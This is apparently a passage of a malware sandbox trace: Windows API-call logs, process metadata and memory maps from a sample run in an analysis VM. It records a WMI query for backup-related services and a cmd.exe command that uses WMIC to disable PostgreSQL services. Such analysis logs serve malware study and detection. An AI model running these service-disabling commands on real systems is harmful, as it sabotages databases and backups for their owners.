??0CHString@@QAE@XZ () returned 0x82f8d8 [0117.808] GetCurrentThreadId () returned 0xfa8 [0117.808] lstrlenA (lpString="") returned 0 [0117.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x979c40, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0117.808] lstrlenA (lpString="") returned 0 [0117.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x979c40, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0117.808] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0117.808] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0117.808] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0xd77a130f | out: _String="Select", _Context=0xd77a130f) returned="Select" [0117.808] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xd77a130f | out: _String=0x0, _Context=0xd77a130f) returned="*" [0117.808] lstrlenW (lpString="FROM") returned 4 [0117.808] lstrlenW (lpString="*") returned 1 [0117.808] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0117.808] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xd77a130f | out: _String=0x0, _Context=0xd77a130f) returned="from" [0117.808] lstrlenW (lpString="FROM") returned 4 [0117.808] lstrlenW (lpString="from") returned 4 [0117.808] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0117.808] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xd77a130f | out: _String=0x0, _Context=0xd77a130f) returned="Win32_Service" [0117.808] lstrlenA (lpString="SELECT * FROM ") returned 14 [0117.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x130431c, cbMultiByte=-1, lpWideCharStr=0x979c40, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0117.808] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0117.808] SysStringLen (param_1="Win32_Service") returned 0xd [0117.808] lstrlenA (lpString=" WHERE ") returned 7 [0117.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1303770, cbMultiByte=-1, lpWideCharStr=0x978d58, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0117.808] SysStringLen (param_1=" WHERE ") returned 0x7 [0117.808] SysStringLen (param_1="caption LIKE '%wsbex%'") returned 0x16 [0117.809] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0117.809] SysStringLen (param_1=" WHERE caption LIKE '%wsbex%'") returned 0x1d [0117.809] IWbemServices:ExecQuery (in: This=0xa308e8, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE caption LIKE '%wsbex%'", lFlags=48, pCtx=0x0, ppEnum=0x82f8e0 | out: ppEnum=0x82f8e0*=0xa8b308) returned 0x0 [0117.815] CoSetProxyBlanket (pProxy=0xa8b308, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0117.819] IEnumWbemClassObject:Next (in: This=0xa8b308, lTimeout=-1, uCount=0x1, apObjects=0x82f8e4, puReturned=0x82f8d0 | out: apObjects=0x82f8e4*=0x0, puReturned=0x82f8d0*=0x0) returned 0x1 [0118.271] IUnknown:Release (This=0xa8b308) returned 0x0 [0118.272] ??1CHString@@QAE@XZ () returned 0x74a66430 [0118.272] ??1CHString@@QAE@XZ () returned 0x74a66430 [0118.272] GetCurrentThreadId () returned 0xfa8 [0118.272] ??0CHString@@QAE@PBG@Z () returned 0x82fa9c [0118.272] ??YCHString@@QAEABV0@PBG@Z () returned 0x82fa9c [0118.272] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x97a0c8, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0118.272] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0118.272] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x979c40, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0118.272] __iob_func () returned 0x77ac1208 [0118.272] fprintf (in: _File=0x77ac1228, _Format="%s" | out: _File=0x77ac1228) returned 27 [0118.273] __iob_func () returned 0x77ac1208 [0118.273] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0118.273] ??1CHString@@QAE@XZ () returned 0x1 [0118.273] IUnknown:Release (This=0xa308e8) returned 0x0 [0118.273] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0118.273] _kbhit () returned 0x0 [0118.274] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0118.275] WbemLocator:IUnknown:Release (This=0xa13488) returned 0x2 [0118.275] IUnknown:Release (This=0xa30cf8) returned 0x0 [0118.275] IUnknown:Release (This=0xa307a8) returned 0x0 [0118.276] WbemLocator:IUnknown:Release (This=0xa13488) returned 0x1 [0118.276] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0118.276] WbemLocator:IUnknown:Release (This=0xa13488) returned 0x0 [0118.277] CoUninitialize () [0118.292] exit (_Code=0) [0118.292] ??1CHString@@QAE@XZ () returned 0x74a66430 [0118.292] ??1CHString@@QAE@XZ () returned 0x74a66430 Thread: id = 281 os_tid = 0xfac Thread: id = 282 os_tid = 0xfb0 Thread: id = 283 os_tid = 0xfb4 Thread: id = 284 os_tid = 0xfb8 Process: id = "64" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x40623000" os_pid = "0xfbc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c WMIC SERVICE WHERE 'caption LIKE '%postgresql%'' CALL ChangeStartMode 'Disabled'" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4194 start_va = 0x380000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 4195 start_va = 0x3a0000 end_va = 0x3a1fff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 4196 start_va = 0x3b0000 end_va = 0x3b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 4197 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 4198 start_va = 0x410000 end_va = 0x440ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 4199 start_va = 0x4410000 end_va = 0x4423fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004410000" filename = "" Region: id = 4200 start_va = 0x4430000 end_va = 0x446ffff entry_point = 0x0 region_type = private name = "private_0x0000000004430000" filename = "" Region: id = 4201 start_va = 0x4470000 end_va = 0x456ffff entry_point = 0x0 region_type = private name = "private_0x0000000004470000" filename = "" Region: id = 4202 start_va = 0x4570000 end_va = 0x4570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004570000" filename = "" Region: id = 4203 start_va = 0x4580000 end_va = 0x4581fff entry_point = 0x0 region_type = private name = "private_0x0000000004580000" filename = "" Region: id = 4204 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4205 start_va = 0x7ecb0000 end_va = 0x7ecd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ecb0000" filename = "" Region: id = 4206 start_va = 0x7ecd4000 end_va = 0x7ecd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ecd4000" filename = "" Region: id = 4207 start_va = 0x7ecdc000 end_va = 0x7ecdefff entry_point = 0x0 region_type = private name = "private_0x000000007ecdc000" filename = "" Region: id = 4208 start_va = 0x7ecdf000 end_va = 0x7ecdffff entry_point = 0x0 region_type = private name = "private_0x000000007ecdf000" filename = "" Region: id = 4209 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4210 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4211 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 4212 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4213 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 4214 start_va = 0x45b0000 end_va = 0x45bffff entry_point = 0x0 region_type = private name = "private_0x00000000045b0000" filename = "" Region: id = 4215 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4216 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4217 start_va = 0x4740000 end_va = 0x483ffff entry_point = 0x0 region_type = private name = "private_0x0000000004740000" filename = "" Region: id = 4218 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4259 start_va = 0x380000 end_va = 0x38ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 4260 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 4261 start_va = 0x45c0000 end_va = 0x467dfff entry_point = 0x45c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4262 start_va = 0x4680000 end_va = 0x46bffff entry_point = 0x0 region_type = private name = "private_0x0000000004680000" filename = "" Region: id = 4263 start_va = 0x4840000 end_va = 0x493ffff entry_point = 0x0 region_type = private name = "private_0x0000000004840000" filename = "" Region: id = 4264 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4265 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4266 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4267 start_va = 0x7ebb0000 end_va = 0x7ecaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ebb0000" filename = "" Region: id = 4268 start_va = 0x7ecd9000 end_va = 0x7ecdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ecd9000" filename = "" Region: id = 4269 start_va = 0x3a0000 end_va = 0x3a3fff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 4270 start_va = 0x4590000 end_va = 0x4593fff entry_point = 0x0 region_type = private name = "private_0x0000000004590000" filename = "" Region: id = 4271 start_va = 0x4940000 end_va = 0x4c76fff entry_point = 0x4940000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 285 os_tid = 0xfc0 [0118.456] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0118.457] __set_app_type (_Type=0x1) [0118.457] __p__fmode () returned 0x77ac4d6c [0118.457] __p__commode () returned 0x77ac5b1c [0118.457] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0118.457] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0118.457] GetCurrentThreadId () returned 0xfc0 [0118.457] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfc0) returned 0x84 [0118.457] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0118.457] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0118.457] SetThreadUILanguage (LangId=0x0) returned 0x409 [0118.460] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0118.460] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x456f9f0 | out: phkResult=0x456f9f0*=0x0) returned 0x2 [0118.460] VirtualQuery (in: lpAddress=0x456f9f7, lpBuffer=0x456f9a8, dwLength=0x1c | out: lpBuffer=0x456f9a8*(BaseAddress=0x456f000, AllocationBase=0x4470000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0118.460] VirtualQuery (in: lpAddress=0x4470000, lpBuffer=0x456f9a8, dwLength=0x1c | out: lpBuffer=0x456f9a8*(BaseAddress=0x4470000, AllocationBase=0x4470000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0118.460] VirtualQuery (in: lpAddress=0x4471000, lpBuffer=0x456f9a8, dwLength=0x1c | out: lpBuffer=0x456f9a8*(BaseAddress=0x4471000, AllocationBase=0x4470000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0118.460] VirtualQuery (in: lpAddress=0x4473000, lpBuffer=0x456f9a8, dwLength=0x1c | out: lpBuffer=0x456f9a8*(BaseAddress=0x4473000, AllocationBase=0x4470000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0118.460] VirtualQuery (in: lpAddress=0x4570000, lpBuffer=0x456f9a8, dwLength=0x1c | out: lpBuffer=0x456f9a8*(BaseAddress=0x4570000, AllocationBase=0x4570000, AllocationProtect=0x2, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0118.460] GetConsoleOutputCP () returned 0x1b5 [0118.460] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0118.460] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0118.460] _get_osfhandle (_FileHandle=1) returned 0x3c [0118.460] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0118.460] _get_osfhandle (_FileHandle=1) returned 0x3c [0118.461] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0118.461] _get_osfhandle (_FileHandle=1) returned 0x3c [0118.461] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0118.461] _get_osfhandle (_FileHandle=0) returned 0x38 [0118.461] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0118.461] _get_osfhandle (_FileHandle=0) returned 0x38 [0118.461] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0118.462] GetEnvironmentStringsW () returned 0x4747e10* [0118.462] FreeEnvironmentStringsA (penv="A") returned 1 [0118.462] GetEnvironmentStringsW () returned 0x4747e10* [0118.462] FreeEnvironmentStringsA (penv="A") returned 1 [0118.462] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x456e954 | out: phkResult=0x456e954*=0x94) returned 0x0 [0118.462] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x456e958, lpData=0x456e960, lpcbData=0x456e95c*=0x1000 | out: lpType=0x456e958*=0x0, lpData=0x456e960*=0x60, lpcbData=0x456e95c*=0x1000) returned 0x2 [0118.462] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x456e958, lpData=0x456e960, lpcbData=0x456e95c*=0x1000 | out: lpType=0x456e958*=0x4, lpData=0x456e960*=0x1, lpcbData=0x456e95c*=0x4) returned 0x0 [0118.463] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x456e958, lpData=0x456e960, lpcbData=0x456e95c*=0x1000 | out: lpType=0x456e958*=0x0, lpData=0x456e960*=0x1, lpcbData=0x456e95c*=0x1000) returned 0x2 [0118.463] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x456e958, lpData=0x456e960, lpcbData=0x456e95c*=0x1000 | out: lpType=0x456e958*=0x4, lpData=0x456e960*=0x0, lpcbData=0x456e95c*=0x4) returned 0x0 [0118.463] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x456e958, lpData=0x456e960, lpcbData=0x456e95c*=0x1000 | out: lpType=0x456e958*=0x4, lpData=0x456e960*=0x40, lpcbData=0x456e95c*=0x4) returned 0x0 [0118.463] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x456e958, lpData=0x456e960, lpcbData=0x456e95c*=0x1000 | out: lpType=0x456e958*=0x4, lpData=0x456e960*=0x40, lpcbData=0x456e95c*=0x4) returned 0x0 [0118.463] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x456e958, lpData=0x456e960, lpcbData=0x456e95c*=0x1000 | out: lpType=0x456e958*=0x0, lpData=0x456e960*=0x40, lpcbData=0x456e95c*=0x1000) returned 0x2 [0118.463] RegCloseKey (hKey=0x94) returned 0x0 [0118.463] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x456e954 | out: phkResult=0x456e954*=0x94) returned 0x0 [0118.463] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x456e958, lpData=0x456e960, lpcbData=0x456e95c*=0x1000 | out: lpType=0x456e958*=0x0, lpData=0x456e960*=0x40, lpcbData=0x456e95c*=0x1000) returned 0x2 [0118.463] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x456e958, lpData=0x456e960, lpcbData=0x456e95c*=0x1000 | out: lpType=0x456e958*=0x4, lpData=0x456e960*=0x1, lpcbData=0x456e95c*=0x4) returned 0x0 [0118.463] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x456e958, lpData=0x456e960, lpcbData=0x456e95c*=0x1000 | out: lpType=0x456e958*=0x0, lpData=0x456e960*=0x1, lpcbData=0x456e95c*=0x1000) returned 0x2 [0118.463] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x456e958, lpData=0x456e960, lpcbData=0x456e95c*=0x1000 | out: lpType=0x456e958*=0x4, lpData=0x456e960*=0x0, lpcbData=0x456e95c*=0x4) returned 0x0 [0118.463] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x456e958, lpData=0x456e960, lpcbData=0x456e95c*=0x1000 | out: lpType=0x456e958*=0x4, lpData=0x456e960*=0x9, lpcbData=0x456e95c*=0x4) returned 0x0 [0118.463] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x456e958, lpData=0x456e960, lpcbData=0x456e95c*=0x1000 | out: lpType=0x456e958*=0x4, lpData=0x456e960*=0x9, lpcbData=0x456e95c*=0x4) returned 0x0 [0118.463] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x456e958, lpData=0x456e960, lpcbData=0x456e95c*=0x1000 | out: lpType=0x456e958*=0x0, lpData=0x456e960*=0x9, lpcbData=0x456e95c*=0x1000) returned 0x2 [0118.463] RegCloseKey (hKey=0x94) returned 0x0 [0118.463] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29827 [0118.463] srand (_Seed=0x5ad29827) [0118.463] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%postgresql%'' CALL ChangeStartMode 'Disabled'" [0118.463] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%postgresql%'' CALL ChangeStartMode 'Disabled'" [0118.463] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0118.463] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4749d68, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0118.463] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0118.463] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0118.463] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0118.463] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0118.463] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0118.463] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0118.463] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0118.463] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0118.463] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0118.463] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0118.463] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0118.464] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0118.464] GetEnvironmentStringsW () returned 0x4747e10* [0118.464] FreeEnvironmentStringsA (penv="A") returned 1 [0118.464] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0118.464] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0118.464] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0118.464] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0118.464] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0118.464] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0118.464] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0118.464] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0118.464] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0118.464] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0118.464] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x456f72c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0118.464] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x456f72c, lpFilePart=0x456f724 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x456f724*="Desktop") returned 0x1d [0118.464] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0118.464] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x456f4a8 | out: lpFindFileData=0x456f4a8) returned 0x47405c8 [0118.464] FindClose (in: hFindFile=0x47405c8 | out: hFindFile=0x47405c8) returned 1 [0118.464] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x456f4a8 | out: lpFindFileData=0x456f4a8) returned 0x47405c8 [0118.465] FindClose (in: hFindFile=0x47405c8 | out: hFindFile=0x47405c8) returned 1 [0118.465] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0118.465] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x456f4a8 | out: lpFindFileData=0x456f4a8) returned 0x47405c8 [0118.465] FindClose (in: hFindFile=0x47405c8 | out: hFindFile=0x47405c8) returned 1 [0118.465] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0118.465] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0118.465] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0118.465] GetEnvironmentStringsW () returned 0x4747e10* [0118.465] FreeEnvironmentStringsA (penv="=") returned 1 [0118.465] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0118.465] GetConsoleOutputCP () returned 0x1b5 [0118.466] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0118.466] GetUserDefaultLCID () returned 0x409 [0118.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0118.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x456f85c, cchData=128 | out: lpLCData="0") returned 2 [0118.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x456f85c, cchData=128 | out: lpLCData="0") returned 2 [0118.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x456f85c, cchData=128 | out: lpLCData="1") returned 2 [0118.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0118.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0118.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0118.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0118.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0118.466] GetLocaleInfoW (in: 